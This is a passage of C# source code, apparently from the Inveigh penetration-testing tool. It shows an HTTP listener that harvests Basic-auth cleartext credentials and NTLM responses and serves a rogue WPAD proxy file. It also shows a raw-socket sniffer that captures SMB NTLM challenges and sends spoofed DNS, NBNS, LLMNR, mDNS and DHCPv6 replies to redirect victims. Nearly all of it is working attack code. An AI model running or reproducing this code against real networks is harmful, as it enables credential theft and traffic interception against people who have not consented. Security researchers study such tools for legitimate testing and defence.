challengeNTLM = "";
}
NTLM.GetNTLMResponse(httpAuthorization, httpSourceIP, httpSourcePort, httpType, httpPort);
httpHeaderStatusCode = new byte[] { 0x32, 0x30, 0x30 };
httpResponsePhrase = new byte[] { 0x4f, 0x4b };
httpClientClose = true;
if (proxyListener)
{
if (!String.IsNullOrEmpty(httpResponse))
{
httpHeaderCacheControl = Encoding.UTF8.GetBytes("Cache-Control: no-cache, no-store");
}
else
{
httpSend = false;
}
}
}
else
{
httpClientClose = true;
}
}
else if (httpHeaderAuthorization.ToUpper().StartsWith("BASIC "))
{
httpHeaderStatusCode = new byte[] { 0x32, 0x30, 0x30 };
httpResponsePhrase = new byte[] { 0x4f, 0x4b };
httpHeaderAuthorization = httpHeaderAuthorization.Substring(6, httpHeaderAuthorization.Length - 6);
string cleartextCredentials = Encoding.UTF8.GetString(Convert.FromBase64String(httpHeaderAuthorization));
lock (Program.cleartextList)
{
Program.cleartextList.Add(String.Concat(httpSourceIP, " ", cleartextCredentials));
}
lock (Program.outputList)
{
Program.outputList.Add(String.Format("[+] [{0}] {1}({2}) Basic authentication cleartext credentials captured from {3}({4}):", DateTime.Now.ToString("s"), httpType, httpPort, httpSourceIP, httpSourcePort));
Program.outputList.Add(cleartextCredentials);
}
if (Program.enabledFileOutput)
{
lock (Program.cleartextFileList)
{
Program.cleartextFileList.Add(String.Concat(httpSourceIP, " ", cleartextCredentials));
}
Program.outputList.Add(String.Format("[!] [{0}] {1}({2}) Basic authentication cleartext credentials written to {3}", DateTime.Now.ToString("s"), httpType, httpPort, String.Concat(Program.argFilePrefix, "-Cleartext.txt")));
}
}
if (!String.IsNullOrEmpty(wpadResponse) && !proxyIgnoreMatch && String.Equals(httpRawURL, "/wpad.dat") && httpClientClose)
{
httpHeaderContentType = Encoding.UTF8.GetBytes("Content-Type: application/x-ns-proxy-autoconfig");
httpMessage = Encoding.UTF8.GetBytes(wpadResponse);
}
else if (!String.IsNullOrEmpty(httpResponse))
{
httpMessage = Encoding.UTF8.GetBytes(httpResponse);
}
byte[] httpTimestamp = Encoding.UTF8.GetBytes(DateTime.Now.ToString("R"));
if ((httpAuth.StartsWith("NTLM") && !String.Equals(httpRawURL, "/wpad.dat")) || (wpadAuth.StartsWith("NTLM") && String.Equals(httpRawURL, "/wpad.dat")))
{
httpHeaderAuthenticateData = Encoding.UTF8.GetBytes(authorizationNTLM);
}
else if ((String.Equals(httpAuth, "BASIC") && !String.Equals(httpRawURL, "/wpad.dat")) || String.Equals(wpadAuth, "BASIC") && String.Equals(httpRawURL, "/wpad.dat"))
{
httpHeaderAuthenticateData = Encoding.UTF8.GetBytes(String.Concat("Basic realm=", httpBasicRealm));
}
using (MemoryStream msHTTP = new MemoryStream())
{
msHTTP.Write((new byte[9] {
0x48, 0x54, 0x54, 0x50, 0x2f, 0x31, 0x2e, 0x31, 0x20
}), 0, 9);
msHTTP.Write(httpHeaderStatusCode, 0, httpHeaderStatusCode.Length);
msHTTP.Write((new byte[1] {
0x20
}), 0, 1);
msHTTP.Write(httpResponsePhrase, 0, httpResponsePhrase.Length);
msHTTP.Write((new byte[2] {
0x0d, 0x0a
}), 0, 2);
if (httpConnectionHeaderClose)
{
byte[] httpHeaderConnection = Encoding.UTF8.GetBytes("Connection: close");
msHTTP.Write(httpHeaderConnection, 0, httpHeaderConnection.Length);
msHTTP.Write((new byte[2] {
0x0d, 0x0a
}), 0, 2);
}
byte[] httpHeaderServer = Encoding.UTF8.GetBytes("Server: Microsoft-HTTPAPI/2.0");
msHTTP.Write(httpHeaderServer, 0, httpHeaderServer.Length);
msHTTP.Write((new byte[2] {
0x0d, 0x0a
}), 0, 2);
msHTTP.Write((new byte[6] {
0x44, 0x61, 0x74, 0x65, 0x3a, 0x20
}), 0, 6);
msHTTP.Write(httpTimestamp, 0, httpTimestamp.Length);
msHTTP.Write((new byte[2] {
0x0d, 0x0a
}), 0, 2);
if (httpMessage != null && httpMessage.Length > 0)
{
httpContentLength = "Content-Length: " + httpMessage.Length;
}
else
{
httpContentLength = "Content-Length: 0";
}
byte[] httpHeaderContentLength = Encoding.UTF8.GetBytes(httpContentLength);
msHTTP.Write(httpHeaderContentLength, 0, httpHeaderContentLength.Length);
msHTTP.Write((new byte[2] {
0x0d, 0x0a
}), 0, 2);
if (httpHeaderAuthenticate != null && httpHeaderAuthenticate.Length > 0 && httpHeaderAuthenticateData != null && httpHeaderAuthenticateData.Length > 0)
{
msHTTP.Write(httpHeaderAuthenticate, 0, httpHeaderAuthenticate.Length);
msHTTP.Write(httpHeaderAuthenticateData, 0, httpHeaderAuthenticateData.Length);
msHTTP.Write((new byte[2] {
0x0d, 0x0a
}), 0, 2);
}
if (httpHeaderContentType != null && httpHeaderContentType.Length > 0)
{
msHTTP.Write(httpHeaderContentType, 0, httpHeaderContentType.Length);
msHTTP.Write((new byte[2] {
0x0d, 0x0a
}), 0, 2);
}
if (httpHeaderCacheControl != null && httpHeaderCacheControl.Length > 0)
{
msHTTP.Write(httpHeaderCacheControl, 0, httpHeaderCacheControl.Length);
msHTTP.Write((new byte[2] {
0x0d, 0x0a
}), 0, 2);
}
msHTTP.Write((new byte[2] {
0x0d, 0x0a
}), 0, 2);
if (httpMessage != null && httpMessage.Length > 0)
{
msHTTP.Write(httpMessage, 0, httpMessage.Length);
}
if (httpSend && httpStream.CanRead)
{
httpStream.Write(msHTTP.ToArray(), 0, msHTTP.ToArray().Length);
httpStream.Flush();
}
}
httpRawURLOld = httpRawURL;
if (httpClientClose)
{
if (proxyListener)
{
httpClient.Client.Close();
}
else
{
httpClient.Close();
}
}
}
else
{
if (!IntPtr.Equals(httpClientHandleOld, httpClient.Client.Handle))
{
httpReset++;
}
else
{
httpReset = 0;
}
if (httpConnectionHeaderClose || httpReset > 20)
{
httpClient.Close();
httpReset = 0;
}
else
{
System.Threading.Thread.Sleep(10);
}
}
System.Threading.Thread.Sleep(100);
}
catch (Exception ex)
{
Program.outputList.Add(String.Format("[-] [{0}] HTTP listener error detected - {1}", DateTime.Now.ToString("s"), ex.ToString()));
}
}
}
public static void SnifferSpoofer(string ipVersion, string snifferIP, string snifferMAC, string spooferIP, string spooferIPv6, string dnsDomainController, string dnsTTL, string llmnrTTL, string mdnsTTL, string nbnsTTL, string[] dnsTypes, string[] mdnsQuestions, string[] mdnsTypes, string[] nbnsTypes, string dhcpv6DomainSuffix, string[] pcapTCP, string[] pcapUDP)
{
byte[] spooferIPData = IPAddress.Parse(spooferIP).GetAddressBytes();
byte[] spooferIPv6Data = IPAddress.Parse(spooferIPv6).GetAddressBytes();
byte[] byteIn = new byte[4] {
1, 0, 0, 0
};
byte[] byteOut = new byte[4] {
1, 0, 0, 0
};
byte[] byteData = new byte[65534];
Socket snifferSocket;
IPEndPoint snifferEndPoint;
EndPoint snifferEndPointRemote;
IPAddress destinationIPAddress = IPAddress.Parse(snifferIP);
int i = 0;
int dhcpv6IPIndex = 1;
Random ipv6Random = new Random();
int ipv6RandomValue = ipv6Random.Next(1, 9999);
byte[] snifferMACArray = new byte[6];
byte[] dhcpv6DomainSuffixData = Util.NewDNSNameArray(dhcpv6DomainSuffix, true);
var ipVersionAddressFamily = AddressFamily.InterNetwork;
if (String.Equals(ipVersion, "IPv6"))
{
snifferEndPointRemote = new IPEndPoint(IPAddress.IPv6Any, 0);
ipVersionAddressFamily = AddressFamily.InterNetworkV6;
snifferMAC = snifferMAC.Insert(2, "-").Insert(5, "-").Insert(8, "-").Insert(11, "-").Insert(14, "-");
foreach (string character in snifferMAC.Split('-'))
{
snifferMACArray[i] = Convert.ToByte(Convert.ToInt16(character, 16));
i++;
}
}
else
{
snifferEndPointRemote = new IPEndPoint(IPAddress.Any, 0);
}
try
{
if (String.Equals(ipVersion, "IPv4"))
{
snifferSocket = new Socket(ipVersionAddressFamily, SocketType.Raw, ProtocolType.IP);
}
else
{
snifferSocket = new Socket(ipVersionAddressFamily, SocketType.Raw, ProtocolType.Udp);
}
snifferEndPoint = new IPEndPoint(IPAddress.Parse(snifferIP), 0);
snifferSocket.SetSocketOption(SocketOptionLevel.IP, SocketOptionName.HeaderIncluded, true);
snifferSocket.ReceiveBufferSize = 65534;
snifferSocket.Bind(snifferEndPoint);
snifferSocket.IOControl(IOControlCode.ReceiveAll, byteIn, byteOut);
}
catch
{
lock (Program.outputList)
{
Program.outputList.Add(String.Format("[-] Error starting packet sniffer, check if shell has elevated privilege or set -Elevated N for unprivileged mode.", DateTime.Now.ToString("s")));
}
throw;
}
int packetLength;
string outputPcap = "";
if (Program.enabledPcap)
{
byte[] pcapHeader = new byte[24] {
0xd4, 0xc3, 0xb2, 0xa1, 0x02, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00
};
outputPcap = Path.Combine(Program.argFileOutputDirectory, String.Concat(Program.argFilePrefix, "-Packets.pcap"));
bool existsPcapFile = File.Exists(outputPcap);
pcapFile = new FileStream(outputPcap, FileMode.Append, FileAccess.Write);
if (!existsPcapFile)
{
pcapFile.Write(pcapHeader, 0, pcapHeader.Length);
}
}
while (!Program.exitInveigh)
{
try
{
try
{
packetLength = snifferSocket.ReceiveFrom(byteData, 0, byteData.Length, SocketFlags.None, ref snifferEndPointRemote);
}
catch
{
packetLength = 0;
}
if (packetLength > 0)
{
MemoryStream memoryStream = new MemoryStream(byteData, 0, packetLength);
BinaryReader binaryReader = new BinaryReader(memoryStream);
IPAddress sourceIPAddress;
int protocolNumber;
byte[] sourceIP = new byte[4];
byte[] destinationIP = new byte[4];
if (String.Equals(ipVersion, "IPv4"))
{
byte versionHL = binaryReader.ReadByte();
binaryReader.ReadByte();
uint totalLength = Util.DataToUInt16(binaryReader.ReadBytes(2)); //this is 0 with tcp offload
binaryReader.ReadBytes(5);
protocolNumber = (int)binaryReader.ReadByte();
binaryReader.ReadBytes(2);
sourceIP = binaryReader.ReadBytes(4);
sourceIPAddress = new IPAddress(sourceIP);
destinationIP = binaryReader.ReadBytes(4);
destinationIPAddress = new IPAddress(destinationIP);
byte headerLength = versionHL;
headerLength <<= 4;
headerLength >>= 4;
headerLength *= 4;
}
else
{
sourceIPAddress = IPAddress.Parse(snifferEndPointRemote.ToString().Substring(0, snifferEndPointRemote.ToString().Length - 2));
protocolNumber = (int)snifferSocket.ProtocolType;
}
switch (protocolNumber)
{
case 6:
uint tcpSourcePort = Util.DataToUInt16(binaryReader.ReadBytes(2));
uint tcpDestinationPort = Util.DataToUInt16(binaryReader.ReadBytes(2));
binaryReader.ReadBytes(8);
byte tcpHeaderLength = binaryReader.ReadByte();
tcpHeaderLength >>= 4;
tcpHeaderLength *= 4;
byte tcpFlags = binaryReader.ReadByte();
binaryReader.ReadBytes(tcpHeaderLength - 15);
byte[] payloadBytes = binaryReader.ReadBytes(packetLength);
string challenge = "";
string session = "";
string tcpSession = sourceIPAddress.ToString() + ":" + Convert.ToString(tcpSourcePort);
string tcpFlagsBinary = Convert.ToString(tcpFlags, 2);
tcpFlagsBinary = tcpFlagsBinary.PadLeft(8, '0');
if (String.Equals(tcpFlagsBinary.Substring(6, 1), "1") && String.Equals(tcpFlagsBinary.Substring(3, 1), "0") && destinationIPAddress.ToString() == snifferIP)
{
lock (Program.outputList)
{
Program.outputList.Add(String.Format("[+] [{0}] TCP({1}) SYN packet from {2}", DateTime.Now.ToString("s"), tcpDestinationPort, tcpSession));
}
}
switch (tcpDestinationPort)
{
case 139:
if (payloadBytes.Length > 0)
{
SMBConnection(payloadBytes, snifferIP, sourceIPAddress.ToString(), destinationIPAddress.ToString(), Convert.ToString(tcpSourcePort), "139");
}
session = sourceIPAddress.ToString() + ":" + Convert.ToString(tcpSourcePort);
if (Program.smbSessionTable.ContainsKey(session))
{
NTLM.GetNTLMResponse(payloadBytes, sourceIPAddress.ToString(), Convert.ToString(tcpSourcePort), "SMB", "139");
}
break;
case 445:
if (payloadBytes.Length > 0)
{
SMBConnection(payloadBytes, snifferIP, sourceIPAddress.ToString(), destinationIPAddress.ToString(), Convert.ToString(tcpSourcePort), "445");
}
session = sourceIPAddress.ToString() + ":" + Convert.ToString(tcpSourcePort);
if (Program.smbSessionTable.ContainsKey(session))
{
NTLM.GetNTLMResponse(payloadBytes, sourceIPAddress.ToString(), Convert.ToString(tcpSourcePort), "SMB", "445");
}
break;
}
switch (tcpSourcePort)
{
case 139:
if (payloadBytes.Length > 0)
{
challenge = NTLM.GetSMBNTLMChallenge(payloadBytes);
}
session = destinationIPAddress.ToString() + ":" + Convert.ToString(tcpDestinationPort);
if (!string.IsNullOrEmpty(challenge) && destinationIP != sourceIP)
{
if (!String.Equals(destinationIP, snifferIP))
{
lock (Program.outputList)
{
Program.outputList.Add(String.Format("[+] [{0}] SMB({1}) NTLM challenge {2} sent to {3}", DateTime.Now.ToString("s"), tcpSourcePort, challenge, session));
}
}
else
{
lock (Program.outputList)
{
Program.outputList.Add(String.Format("[+] [{0}] SMB({1}) NTLM challenge {2} from {3}", DateTime.Now.ToString("s"), tcpSourcePort, challenge, session));
}
}
Program.smbSessionTable[session] = challenge;
}
break;
case 445:
if (payloadBytes.Length > 0)
{
challenge = NTLM.GetSMBNTLMChallenge(payloadBytes);
}
session = destinationIPAddress.ToString() + ":" + Convert.ToString(tcpDestinationPort);
if (!String.IsNullOrEmpty(challenge) && destinationIP != sourceIP)
{
if (!String.Equals(destinationIP, snifferIP))
{
lock (Program.outputList)
{
Program.outputList.Add(String.Format("[+] [{0}] SMB({1}) NTLM challenge {2} sent to {3}", DateTime.Now.ToString("s"), tcpSourcePort, challenge, session));
}
}
else
{
lock (Program.outputList)
{
Program.outputList.Add(String.Format("[+] [{0}] SMB({1}) NTLM challenge {2} from {3}", DateTime.Now.ToString("s"), tcpSourcePort, challenge, session));
}
}
Program.smbSessionTable[session] = challenge;
}
break;
}
if (Program.enabledPcap && String.Equals(ipVersion, "IPv4") && (pcapTCP != null && pcapTCP.Length > 0 && (Array.Exists(pcapTCP, element => element == tcpSourcePort.ToString()) ||
Array.Exists(pcapTCP, element => element == tcpDestinationPort.ToString()) || Array.Exists(pcapTCP, element => element == "ALL"))))
{
PcapOutput((uint)packetLength, byteData);
}
break;
case 17:
byte[] udpSourcePort = binaryReader.ReadBytes(2);
uint endpointSourcePort = Util.DataToUInt16(udpSourcePort);
uint udpDestinationPort = Util.DataToUInt16(binaryReader.ReadBytes(2));
uint udpLength = Util.DataToUInt16(binaryReader.ReadBytes(2));
binaryReader.ReadBytes(2);
byte[] udpPayload;
try
{
udpPayload = binaryReader.ReadBytes(((int)udpLength - 2) * 4);
}
catch
{
udpPayload = new byte[2];
}
switch (udpDestinationPort)
{
case 53:
string dnsRequestHost = Util.ParseNameQuery(12, udpPayload);
byte[] dnsRequest = new byte[dnsRequestHost.Length + 2];
System.Buffer.BlockCopy(udpPayload, 12, dnsRequest, 0, dnsRequest.Length);
string[] dnsRequestSplit = dnsRequestHost.Split('.');
byte[] dnsRequestRecordType = new byte[2];
System.Buffer.BlockCopy(udpPayload, (dnsRequest.Length + 12), dnsRequestRecordType, 0, 2);
string dnsRecordType = Util.GetRecordType(dnsRequestRecordType);
string dnsResponseMessage = Util.CheckRequest(dnsRequestHost, sourceIPAddress.ToString(), snifferIP.ToString(), "DNS", dnsRecordType, dnsTypes);
if (Program.enabledDNS && String.Equals(dnsResponseMessage, "response sent"))
{
if ((int)udpPayload[2] != 40)
{
byte[] dnsResponse = DNS.GetDNSResponse("sniffer", ipVersion, dnsDomainController, dnsTTL, dnsRecordType, sourceIPAddress, destinationIPAddress, spooferIPData, udpSourcePort, udpPayload);
UDP.UDPSnifferClient(null, 0, sourceIPAddress, (int)endpointSourcePort, ipVersion, dnsResponse);
}
else
{
byte[] dnsResponse = DNS.GetDNSResponse("sniffer", ipVersion, dnsDomainController, dnsTTL, dnsRecordType, sourceIPAddress, destinationIPAddress, spooferIPData, udpSourcePort, udpPayload);
UDP.UDPSnifferClient(null, 0, sourceIPAddress, (int)endpointSourcePort, ipVersion, dnsResponse);
}
}
if (String.Equals(destinationIPAddress.ToString(), snifferIP.ToString()))
{
lock (Program.outputList)
{
Program.outputList.Add(String.Format("[+] [{0}] DNS({1}) request for {2} from {3} [{4}]", DateTime.Now.ToString("s"), dnsRecordType, dnsRequestHost, sourceIPAddress, dnsResponseMessage));
}
}
else
{
lock (Program.outputList)
{
Program.outputList.Add(String.Format("[+] [{0}] DNS({1}) request for {2} sent to {3} [{4}]", DateTime.Now.ToString("s"), dnsRecordType, dnsRequestHost, destinationIPAddress, "outgoing query"));
}
}
break;
case 137:
if (String.Equals(ipVersion, "IPv4"))
{
byte[] nbnsQuestionsAnswerRRs = new byte[4];
System.Buffer.BlockCopy(udpPayload, 4, nbnsQuestionsAnswerRRs, 0, 4);
byte[] nbnsAdditionalRRs = new byte[2];
System.Buffer.BlockCopy(udpPayload, 10, nbnsAdditionalRRs, 0, 2);
if (String.Equals(BitConverter.ToString(nbnsQuestionsAnswerRRs), "00-01-00-00") && !String.Equals(BitConverter.ToString(nbnsAdditionalRRs), "00-01"))
{
byte[] nbnsRequestType = new byte[2];
System.Buffer.BlockCopy(udpPayload, 43, nbnsRequestType, 0, 2);
string nbnsQueryType = NBNS.NBNSQueryType(nbnsRequestType);
byte[] nbnsType = new byte[1];
System.Buffer.BlockCopy(udpPayload, 47, nbnsType, 0, 1);
byte[] nbnsRequest = new byte[udpPayload.Length - 20];
System.Buffer.BlockCopy(udpPayload, 13, nbnsRequest, 0, nbnsRequest.Length);
string nbnsRequestHost = NBNS.BytesToNBNSQuery(nbnsRequest);
string nbnsResponseMessage = Util.CheckRequest(nbnsRequestHost, sourceIPAddress.ToString(), snifferIP.ToString(), "NBNS", nbnsQueryType, nbnsTypes);
if (Program.enabledNBNS && String.Equals(nbnsResponseMessage, "response sent"))
{
if (Array.Exists(nbnsTypes, element => element == nbnsQueryType) && !String.Equals(BitConverter.ToString(nbnsType), "21"))
{
byte[] nbnsResponse = NBNS.GetNBNSResponse("sniffer", nbnsTTL, spooferIPData, udpSourcePort, udpPayload);
UDP.UDPSnifferClient(null, 0, sourceIPAddress, (int)endpointSourcePort, ipVersion, nbnsResponse);
}
else if (String.Equals(BitConverter.ToString(nbnsType), "21"))
{
nbnsResponseMessage = "NBSTAT request";
}
else
{
nbnsResponseMessage = "NBNS type disabled";
}
}
lock (Program.outputList)
{
Program.outputList.Add(String.Format("[+] [{0}] NBNS request for {1}<{2}> from {3} [{4}]", DateTime.Now.ToString("s"), nbnsRequestHost, nbnsQueryType, sourceIPAddress, nbnsResponseMessage));
}
}
}
break;
case 547:
if (String.Equals(ipVersion, "IPv6"))
{
byte[] dhcpv6MessageTypeID = new byte[1];
Buffer.BlockCopy(udpPayload, 0, dhcpv6MessageTypeID, 0, 1);
byte[] dhcpv6ClientMACData = new byte[6];
Buffer.BlockCopy(udpPayload, 22, dhcpv6ClientMACData, 0, 6);
string dhcpv6ClientMAC = BitConverter.ToString(dhcpv6ClientMACData).Replace("-", ":");
byte[] dhcpv6IAID = new byte[4];
if ((int)dhcpv6MessageTypeID[0] == 1)
{
Buffer.BlockCopy(udpPayload, 32, dhcpv6IAID, 0, 4);
}
else
{
Buffer.BlockCopy(udpPayload, 46, dhcpv6IAID, 0, 4);
}
byte[] dhcpv6ClientIP = new byte[16];
string dhcpv6LeaseIP = "";
string dhcpv6FQDN = "";
if ((int)dhcpv6MessageTypeID[0] == 1 || (int)dhcpv6MessageTypeID[0] == 3 || (int)dhcpv6MessageTypeID[0] == 5)
{
for (i = 12; i < udpPayload.Length; i++)
{
if (Util.UInt16DataLength(i, udpPayload) == 39)
{
dhcpv6FQDN = Util.ParseNameQuery((i + 4), udpPayload);
}
}
int index = BitConverter.ToString(udpPayload).Replace("-", String.Empty).IndexOf("4D53465420352E30");
if (index >= 0 && Program.dhcpv6ClientTable.ContainsKey(dhcpv6ClientMAC))
{
dhcpv6LeaseIP = Program.dhcpv6ClientTable[dhcpv6ClientMAC].ToString();
dhcpv6ClientIP = IPAddress.Parse(dhcpv6LeaseIP).GetAddressBytes();
}
else if (index >= 0 && !Program.dhcpv6ClientTable.ContainsKey(dhcpv6ClientMAC))
{
dhcpv6LeaseIP = "fe80::" + ipv6RandomValue + ":" + dhcpv6IPIndex;
dhcpv6ClientIP = IPAddress.Parse(dhcpv6LeaseIP).GetAddressBytes();
Program.dhcpv6ClientTable.Add(dhcpv6ClientMAC, dhcpv6LeaseIP);
dhcpv6IPIndex++;
lock (Program.dhcpv6FileList)
{
Program.dhcpv6FileList.Add(dhcpv6ClientMAC + "," + dhcpv6LeaseIP);
}
}
string dhcpv6ResponseMessage = DHCPv6.DHCPv6Output(dhcpv6ClientMAC, dhcpv6FQDN, dhcpv6LeaseIP, sourceIPAddress.ToString(), index, (int)dhcpv6MessageTypeID[0]);
if (String.Equals(dhcpv6ResponseMessage, "response sent"))
{
byte[] dhcpv6Response = DHCPv6.GetDHCPv6Response("sniffer", dhcpv6DomainSuffix, sourceIPAddress, destinationIPAddress, dhcpv6ClientIP, spooferIPv6Data, snifferMACArray, udpSourcePort, udpPayload);
UDP.UDPSnifferClient(destinationIPAddress, 547, sourceIPAddress, 546, ipVersion, dhcpv6Response);
}
}
}
break;
case 5353:
if (String.Equals(ipVersion, "IPv4"))
{
string mdnsResponseMessage = "";
byte[] mdnsType = new byte[2];
if (BitConverter.ToString(udpPayload).EndsWith("-00-01-80-01") && String.Equals(BitConverter.ToString(udpPayload).Substring(12, 23), "00-01-00-00-00-00-00-00"))
{
//udpLength += 10;
byte[] ttlMDNS = BitConverter.GetBytes(Int32.Parse(mdnsTTL));
Array.Reverse(ttlMDNS);
byte[] mdnsTransactionID = new byte[2];
string mdnsRequestHostFull = Util.ParseNameQuery(12, udpPayload);
System.Buffer.BlockCopy(udpPayload, 0, mdnsTransactionID, 0, 2);
byte[] mdnsRequest = new byte[mdnsRequestHostFull.Length + 2];
System.Buffer.BlockCopy(udpPayload, 12, mdnsRequest, 0, mdnsRequest.Length);
string[] mdnsRequestSplit = mdnsRequestHostFull.Split('.');
if (mdnsRequestSplit != null && mdnsRequestSplit.Length > 0)
{
mdnsResponseMessage = Util.CheckRequest(mdnsRequestSplit[0], sourceIPAddress.ToString(), snifferIP.ToString(), "MDNS", "QU", mdnsQuestions);
}
if (Program.enabledMDNS && String.Equals(mdnsResponseMessage, "response sent"))
{
if (Array.Exists(mdnsQuestions, element => element == "QU"))
{
byte[] mdnsResponse = MDNS.GetMDNSResponse("sniffer", ipVersion, mdnsTTL, sourceIPAddress, destinationIPAddress, spooferIPData, spooferIPv6Data, udpSourcePort, udpPayload);
UDP.UDPSnifferClient(null, 0, sourceIPAddress, (int)endpointSourcePort, ipVersion, mdnsResponse);
}
else
{
mdnsResponseMessage = "mDNS type disabled";
}
}
lock (Program.outputList)
{
Program.outputList.Add(String.Format("[+] [{0}] mDNS(QU) request for {1} from {2} [{3}]", DateTime.Now.ToString("s"), mdnsRequestHostFull, sourceIPAddress, mdnsResponseMessage));
}
}
else if (BitConverter.ToString(udpPayload).EndsWith("-00-01") && (String.Equals(BitConverter.ToString(udpPayload).Substring(12, 23), "00-01-00-00-00-00-00-00") ||
String.Equals(BitConverter.ToString(udpPayload).Substring(12, 23), "00-02-00-00-00-00-00-00")))
{
//udpLength += 4;
byte[] ttlMDNS = BitConverter.GetBytes(Int32.Parse(mdnsTTL));
Array.Reverse(ttlMDNS);
byte[] mdnsTransactionID = new byte[2];
System.Buffer.BlockCopy(udpPayload, 0, mdnsTransactionID, 0, 2);
string mdnsRequestHostFull = Util.ParseNameQuery(12, udpPayload);
byte[] mdnsRequest = new byte[mdnsRequestHostFull.Length + 2];
System.Buffer.BlockCopy(udpPayload, 12, mdnsRequest, 0, mdnsRequest.Length);
string[] mdnsRequestSplit = mdnsRequestHostFull.Split('.');
if (mdnsRequestSplit != null && mdnsRequestSplit.Length > 0)
{
mdnsResponseMessage = Util.CheckRequest(mdnsRequestSplit[0], sourceIPAddress.ToString(), snifferIP.ToString(), "MDNS", "QM", mdnsQuestions);
}
if (Program.enabledMDNS && String.Equals(mdnsResponseMessage, "response sent"))
{
if (Array.Exists(mdnsQuestions, element => element == "QM"))
{
byte[] mdnsResponse = MDNS.GetMDNSResponse("sniffer", ipVersion, mdnsTTL, sourceIPAddress, destinationIPAddress, spooferIPData, spooferIPv6Data, udpSourcePort, udpPayload);
UDP.UDPSnifferClient(null, 0, IPAddress.Parse("224.0.0.251"), 5353, ipVersion, mdnsResponse);
}
else
{
mdnsResponseMessage = "mDNS type disabled";
}
}
lock (Program.outputList)
{
Program.outputList.Add(String.Format("[+] [{0}] mDNS(QM) request for {1} from {2} [{3}]", DateTime.Now.ToString("s"), mdnsRequestHostFull, sourceIPAddress, mdnsResponseMessage));
}
}
}
break;
case 5355:
string llmnrResponseMessage = "";
byte[] ttlLLMNR = BitConverter.GetBytes(Int32.Parse(llmnrTTL));
Array.Reverse(ttlLLMNR);
byte[] llmnrType = new byte[2];
System.Buffer.BlockCopy(udpPayload, (udpPayload.Length - 4), llmnrType, 0, 2);
if (String.Equals(ipVersion, "IPv4") && !String.Equals(BitConverter.ToString(llmnrType), "00-1C") || String.Equals(ipVersion, "IPv6") && String.Equals(BitConverter.ToString(llmnrType), "00-1C"))
{
udpLength += (byte)(udpPayload.Length - 2);
Array.Reverse(udpSourcePort);
byte[] llmnrTransactionID = new byte[2];
System.Buffer.BlockCopy(udpPayload, 0, llmnrTransactionID, 0, 2);
byte[] llmnrRequest = new byte[udpPayload.Length - 18];
byte[] llmnrRequestLength = new byte[1];
System.Buffer.BlockCopy(udpPayload, 12, llmnrRequestLength, 0, 1);
System.Buffer.BlockCopy(udpPayload, 13, llmnrRequest, 0, llmnrRequest.Length);
string llmnrRequestHost = Util.ParseNameQuery(12, udpPayload);
string llmnrVersion = "LLMNR";
if (String.Equals(ipVersion, "IPv6"))
{
llmnrVersion = "LLMNRv6";
}
llmnrResponseMessage = Util.CheckRequest(llmnrRequestHost, sourceIPAddress.ToString(), snifferIP.ToString(), llmnrVersion, null, null);
if (String.Equals(llmnrResponseMessage, "response sent"))
{
byte[] llmnrResponse = LLMNR.GetLLMNRResponse("sniffer", ipVersion, llmnrTTL, sourceIPAddress, destinationIPAddress, spooferIPData, spooferIPv6Data, udpSourcePort, udpPayload);
UDP.UDPSnifferClient(null, 0, sourceIPAddress, (int)endpointSourcePort, ipVersion, llmnrResponse);
}
lock (Program.outputList)
{
Program.outputList.Add(String.Format("[+] [{0}] {1} request for {2} from {3} [{4}]", DateTime.Now.ToString("s"), llmnrVersion, llmnrRequestHost, sourceIPAddress, llmnrResponseMessage));
}
}
break;
}
if (Program.enabledPcap && String.Equals(ipVersion, "IPv4") && (pcapUDP != null && pcapUDP.Length > 0 && (Array.Exists(pcapUDP, element => element == udpSourcePort.ToString()) ||
Array.Exists(pcapUDP, element => element == udpDestinationPort.ToString()) || Array.Exists(pcapUDP, element => element == "ALL"))))
{
PcapOutput((uint)packetLength, byteData);
}
break;
}
}
}
catch (Exception ex)
{
Program.outputList.Add(String.Format("[-] [{0}] Packet sniffing error detected - {1}", DateTime.Now.ToString("s"), ex.ToString()));
}
}
}